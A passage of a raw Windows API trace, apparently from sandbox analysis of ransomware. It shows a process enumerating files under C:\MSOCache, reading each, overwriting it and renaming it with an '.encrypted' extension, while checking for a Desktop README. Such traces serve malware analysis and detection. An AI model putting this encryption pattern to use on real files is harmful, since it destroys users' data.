FindNextFileW (in: hFindFile=0x94f06b0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc138cb0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x567, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office32MUI.xml", cAlternateFileName="OFFICE~1.XML")) returned 1 [0197.451] FindNextFileW (in: hFindFile=0x94f06b0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc301560, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2cb13b, dwReserved0=0x0, dwReserved1=0x0, cFileName="OWOW32LR.cab", cAlternateFileName="")) returned 1 [0197.451] FindNextFileW (in: hFindFile=0x94f06b0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc3e4630, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x93a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0197.451] FindNextFileW (in: hFindFile=0x94f06b0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0197.451] FindClose (in: hFindFile=0x94f06b0 | out: hFindFile=0x94f06b0) returned 1 [0197.452] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7f8) returned 1 [0197.452] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee804) returned 1 [0197.452] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee838) returned 1 [0197.452] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0197.452] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x2ee314, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0197.453] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2ee560 | out: lpFindFileData=0x2ee560*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc138cb0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc3e6570, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc3e6570, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94f06b0 [0197.453] FindNextFileW (in: hFindFile=0x94f06b0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc138cb0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc3e6570, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc3e6570, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.454] FindNextFileW (in: hFindFile=0x94f06b0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc138cb0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd5600, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office32MUI.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0197.454] FindNextFileW (in: hFindFile=0x94f06b0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc138cb0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x567, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office32MUI.xml", cAlternateFileName="OFFICE~1.XML")) returned 1 [0197.454] FindNextFileW (in: hFindFile=0x94f06b0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc301560, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2cb13b, dwReserved0=0x0, dwReserved1=0x0, cFileName="OWOW32LR.cab", cAlternateFileName="")) returned 1 [0197.454] FindNextFileW (in: hFindFile=0x94f06b0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc3e4630, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x93a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0197.454] FindNextFileW (in: hFindFile=0x94f06b0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc3e4630, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x93a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0197.454] FindClose (in: hFindFile=0x94f06b0 | out: hFindFile=0x94f06b0) returned 1 [0197.455] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7f8) returned 1 [0197.455] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee804) returned 1 [0197.455] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", nBufferLength=0x105, lpBuffer=0x2ee22c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpFilePart=0x0) returned 0x4e [0197.455] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee720) returned 1 [0197.455] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0197.457] GetFileType (hFile=0x26c) returned 0x1 [0197.457] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee71c) returned 1 [0197.457] GetFileType (hFile=0x26c) returned 0x1 [0197.457] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x2ee828 | out: lpFileSizeHigh=0x2ee828*=0x0) returned 0x567 [0197.457] ReadFile (in: hFile=0x26c, lpBuffer=0x23476e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ee7d4, lpOverlapped=0x0 | out: lpBuffer=0x23476e4*, lpNumberOfBytesRead=0x2ee7d4*=0x567, lpOverlapped=0x0) returned 1 [0197.459] CloseHandle (hObject=0x26c) returned 1 [0197.474] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0197.474] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7a0) returned 1 [0197.474] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee81c | out: lpFileInformation=0x2ee81c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0197.474] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee79c) returned 1 [0197.474] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", nBufferLength=0x105, lpBuffer=0x2ee214, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpFilePart=0x0) returned 0x4e [0197.475] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee708) returned 1 [0197.475] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0197.476] GetFileType (hFile=0x26c) returned 0x1 [0197.476] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee704) returned 1 [0197.476] GetFileType (hFile=0x26c) returned 0x1 [0197.476] WriteFile (in: hFile=0x26c, lpBuffer=0x239723c*, nNumberOfBytesToWrite=0x570, lpNumberOfBytesWritten=0x2ee798, lpOverlapped=0x0 | out: lpBuffer=0x239723c*, lpNumberOfBytesWritten=0x2ee798*=0x570, lpOverlapped=0x0) returned 1 [0197.477] CloseHandle (hObject=0x26c) returned 1 [0197.478] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpFilePart=0x0) returned 0x4e [0197.478] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.encrypted", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.encrypted", lpFilePart=0x0) returned 0x58 [0197.478] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7ac) returned 1 [0197.478] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml"), fInfoLevelId=0x0, lpFileInformation=0x2ee828 | out: lpFileInformation=0x2ee828*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x5b427060, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x570)) returned 1 [0197.478] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7a8) returned 1 [0197.478] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.encrypted" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml.encrypted")) returned 1 [0197.484] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", nBufferLength=0x105, lpBuffer=0x2ee22c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpFilePart=0x0) returned 0x4b [0197.484] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee720) returned 1 [0197.484] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0197.484] GetFileType (hFile=0x26c) returned 0x1 [0197.484] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee71c) returned 1 [0197.484] GetFileType (hFile=0x26c) returned 0x1 [0197.484] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x2ee828 | out: lpFileSizeHigh=0x2ee828*=0x0) returned 0x2cb13b [0197.501] ReadFile (in: hFile=0x26c, lpBuffer=0x32054d0, nNumberOfBytesToRead=0x2cb13b, lpNumberOfBytesRead=0x2ee7d4, lpOverlapped=0x0 | out: lpBuffer=0x32054d0*, lpNumberOfBytesRead=0x2ee7d4*=0x2cb13b, lpOverlapped=0x0) returned 1 [0197.549] CloseHandle (hObject=0x26c) returned 1 [0197.739] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0197.740] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7a0) returned 1 [0197.740] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee81c | out: lpFileInformation=0x2ee81c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0197.740] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee79c) returned 1 [0197.740] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", nBufferLength=0x105, lpBuffer=0x2ee214, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpFilePart=0x0) returned 0x4b [0197.740] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee708) returned 1 [0197.740] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0197.750] GetFileType (hFile=0x26c) returned 0x1 [0197.750] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee704) returned 1 [0197.750] GetFileType (hFile=0x26c) returned 0x1 [0197.750] WriteFile (in: hFile=0x26c, lpBuffer=0x3d05fe0*, nNumberOfBytesToWrite=0x2cb140, lpNumberOfBytesWritten=0x2ee7c4, lpOverlapped=0x0 | out: lpBuffer=0x3d05fe0*, lpNumberOfBytesWritten=0x2ee7c4*=0x2cb140, lpOverlapped=0x0) returned 1 [0197.812] CloseHandle (hObject=0x26c) returned 1 [0197.864] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpFilePart=0x0) returned 0x4b [0197.864] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab.encrypted", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab.encrypted", lpFilePart=0x0) returned 0x55 [0197.864] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7ac) returned 1 [0197.864] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab"), fInfoLevelId=0x0, lpFileInformation=0x2ee828 | out: lpFileInformation=0x2ee828*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x5b7df2c0, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x2cb140)) returned 1 [0197.864] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7a8) returned 1 [0197.865] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab.encrypted" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab.encrypted")) returned 1 [0197.866] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2ee22c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0197.866] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee720) returned 1 [0197.866] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0197.866] GetFileType (hFile=0x26c) returned 0x1 [0197.866] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee71c) returned 1 [0197.866] GetFileType (hFile=0x26c) returned 0x1 [0197.866] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x2ee828 | out: lpFileSizeHigh=0x2ee828*=0x0) returned 0x93a [0197.866] ReadFile (in: hFile=0x26c, lpBuffer=0x23e6260, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ee7d4, lpOverlapped=0x0 | out: lpBuffer=0x23e6260*, lpNumberOfBytesRead=0x2ee7d4*=0x93a, lpOverlapped=0x0) returned 1 [0197.872] CloseHandle (hObject=0x26c) returned 1 [0197.888] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0197.888] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7a0) returned 1 [0197.888] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee81c | out: lpFileInformation=0x2ee81c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0197.888] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee79c) returned 1 [0197.888] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2ee214, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0197.888] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee708) returned 1 [0197.888] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0197.889] GetFileType (hFile=0x26c) returned 0x1 [0197.889] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee704) returned 1 [0197.889] GetFileType (hFile=0x26c) returned 0x1 [0197.890] WriteFile (in: hFile=0x26c, lpBuffer=0x24370ac*, nNumberOfBytesToWrite=0x940, lpNumberOfBytesWritten=0x2ee798, lpOverlapped=0x0 | out: lpBuffer=0x24370ac*, lpNumberOfBytesWritten=0x2ee798*=0x940, lpOverlapped=0x0) returned 1 [0197.891] CloseHandle (hObject=0x26c) returned 1 [0197.892] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0197.892] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.encrypted", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.encrypted", lpFilePart=0x0) returned 0x52 [0197.892] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7ac) returned 1 [0197.892] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x2ee828 | out: lpFileInformation=0x2ee828*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x5b805420, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x940)) returned 1 [0197.892] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7a8) returned 1 [0197.892] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.encrypted" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml.encrypted")) returned 1 [0197.894] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee838) returned 1 [0197.894] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0197.894] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x2ee314, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0197.894] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2ee560 | out: lpFindFileData=0x2ee560*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf6e34d70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa13c510, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94f0830 [0197.906] FindNextFileW (in: hFindFile=0x94f0830, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf6e34d70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa13c510, ftLastAccessTime.dwHighDateTime=0x1d301be, 